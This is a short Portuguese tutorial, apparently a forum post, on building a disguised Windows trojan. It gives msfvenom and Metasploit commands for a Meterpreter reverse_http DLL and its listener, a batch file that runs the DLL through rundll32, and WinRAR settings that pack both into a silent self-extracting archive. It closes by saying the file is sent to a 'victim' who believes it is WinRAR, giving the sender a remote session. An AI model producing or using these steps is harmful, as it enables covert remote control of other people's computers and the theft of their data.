Descrição
Primeiramente vamos criar nosso payload
Código: Selecionar todos
msfvenom --plataform windows --arch x86 -p windows/meterpreter/reverse_http LHOST=seuhost LPORT=suaporta -f dll > inject.dllAbra o console
Código: Selecionar todos
msfconsoleSeleciona o exploit
Código: Selecionar todos
use exploit/multi/handlerSete o payload
Código: Selecionar todos
set PAYLOAD windows/meterpreter/reverse_httpSete o host
Código: Selecionar todos
set LHOST seuhostSete a porta
Código: Selecionar todos
set LPORT suaportaVamos rodar agora para ficar esperando a conexão
Código: Selecionar todos
exploit -jAbra um arquivo bat e coloque as segunte linhas
Código: Selecionar todos
@echo off
echo [*] Aguarde por favor.....
rundll32.exe inject.dll.main
exitSalve o arquivo com o nome que quiser
Nessa parte será necessário um windows ou então um programa de emulação de programas do windows chamado de wine
Na maquina com windows tenha instalado o winrar e mova para a máquina os dois arquivos, o payload que é o inejct.dll e o bat que é o nome que vocês escolheram
Selecione os dois e clique em “Adicionar para o arquivo”, vamos compactar eles
Quando abrir a tela do winrar vá onde está escrito “Opções de Compressão” e marque a caixinha onde tá escrito “Criar arquivo SFX”
Depois vá na aba “Avançado” e em “Opções SFX….”
Vamos em configurações, onde está escrito “executar depois da extração” coloque a linha abaixo
Código: Selecionar todos
nomedoseubat.batEm “Metódos” procure por “Modo silencioso” e selecione a opção “Ocultar tudo”
Vamos em “Atualizar” e em “Metódo de substituição” e selecione a opção “Ignorar arquivos existentes”
Após isso de ok em tudo e vai criar o arquivo em sua área de trabalho
Esse arquivo você enviará para sua vítima e ela vai abrir achando que é winrar, após ela executar uma sessão será criada no metasploit
